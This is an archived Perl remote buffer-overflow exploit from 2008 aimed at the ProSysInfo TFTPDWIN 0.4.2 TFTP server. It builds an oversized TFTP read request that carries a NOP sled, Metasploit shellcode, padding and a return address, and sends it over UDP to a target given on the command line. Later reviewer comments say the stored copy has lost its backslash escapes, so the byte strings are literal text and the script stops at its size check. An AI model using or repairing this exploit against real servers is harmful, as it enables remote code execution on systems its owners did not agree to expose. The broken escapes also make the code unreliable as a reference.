
prosystftpd_exploit.pl.txt

Posted on 13 December 2008

#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
#
# NOTE(review): archived 2008 proof-of-concept.  The copy stored here has
# lost its line breaks and, apparently, every backslash escape (what the
# author's comments describe as byte sequences appear as the literal text
# "xNN").  As stored, the string literals below are plain ASCII text, so
# length($shellcode) is 480 rather than the 160 the header claims and the
# size check further down exits before any datagram is sent.

use IO::Socket;
use warnings;
use strict;

# Usage banner.  Only the presence of a first argument is checked; it is
# handed to IO::Socket::INET as PeerAddr below without any validation.
if(!($ARGV[0])) {
    print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2 ";
    print " Universal Remote Buffer Overflow Exploit ";
    print "[x] Exploit by SkD (skdrat@ hotmail.com) ";
    print "[x] Usage: prosystftpd_exploit.pl <target IP> ";
    exit(0);
}

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
# Per the author's lines above: a Metasploit-generated payload that runs
# calc.exe, 160 bytes, encoded to avoid NUL and the bytes 'n','e','t'
# (0x6e 0x65 0x74).  The source of the actual bytes is not on this page.
my $shellcode = "x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0exaf".
"x4fxb9xecx83xeexfcxe2xf4x53xa7xfdxecxafx4fx32xa9".
"x93xc4xc5xe9xd7x4ex56x67xe0x57x32xb3x8fx4ex52xa5".
"x24x7bx32xedx41x7ex79x75x03xcbx79x98xa8x8ex73xe1".
"xaex8dx52x18x94x1bx9dxe8xdaxaax32xb3x8bx4ex52x8a".
"x24x43xf2x67xf0x53xb8x07x24x53x32xedx44xc6xe5xc8".
"xabx8cx88x2cxcbxc4xf9xdcx2ax8fxc1xe0x24x0fxb5x67".
"xdfx53x14x67xc7x47x52xe5x24xcfx09xecxafx4fx32x84".
"x93x10x88x1axcfx19x30x14x2cx8fxc2xbcxc7xbfx33xe8".
"xf0x27x21x12x25x41xeex13x48x2cxd8x80xccx4fxb9xec";

# Leading two bytes of the request, presumably the TFTP opcode
# (00 01 is RRQ in RFC 1350, which the header cites).
my $p1="x00x01";
# Trailing field: bytes 6e 65 74 61 73 63 69 69 00 spell "netascii" plus a
# terminating NUL, i.e. the TFTP transfer-mode string.
my $p2="x00x6ex65x74x61x73x63x69x69x00";
# Three bytes the author labels as address 0040105D; in $packet they are
# immediately followed by the leading x00 of $p2.
my $ret = "x5dx10x40"; #0040105D -> :) SkD's Tricks
# Intended as ten 0x90 bytes (as stored, ten copies of the text "x90").
my $nopsled = "x90" x 10;
# The nopsled + shellcode + padding region is fixed at 274 bytes; the
# payload has to fit inside it or the script gives up here.
my $len = (274 - length($shellcode));
if($len < 0) {
    print "[x] Your shellcode is too big! Find another way :) ";
    exit(0);
}
my $overflow = "x41" x $len;
# Datagram layout: $p1, $nopsled, $shellcode, "x41" padding up to 274,
# $ret, $p2.  With the intended byte values that is a single 289-byte
# request -- far larger than any legitimate RRQ, which is the only network
# artifact a defender would see from this script.
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));

# One unauthenticated UDP datagram to port 69; no reply is ever read.
# (Indirect-object `new Class(...)` syntax; Class->new(...) is preferred.)
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect! " unless $sock;
# For UDP, a successful socket constructor says nothing about the peer;
# every status line below is printed unconditionally and the print to
# $sock is unchecked, so the messages do not reflect any real outcome.
print "[x] Connected to daemon :) ";
print "[x] Sending packet.. ";
print $sock $packet;
sleep(1);
close $sock;
print "[x] Target owned! ";
exit(0);

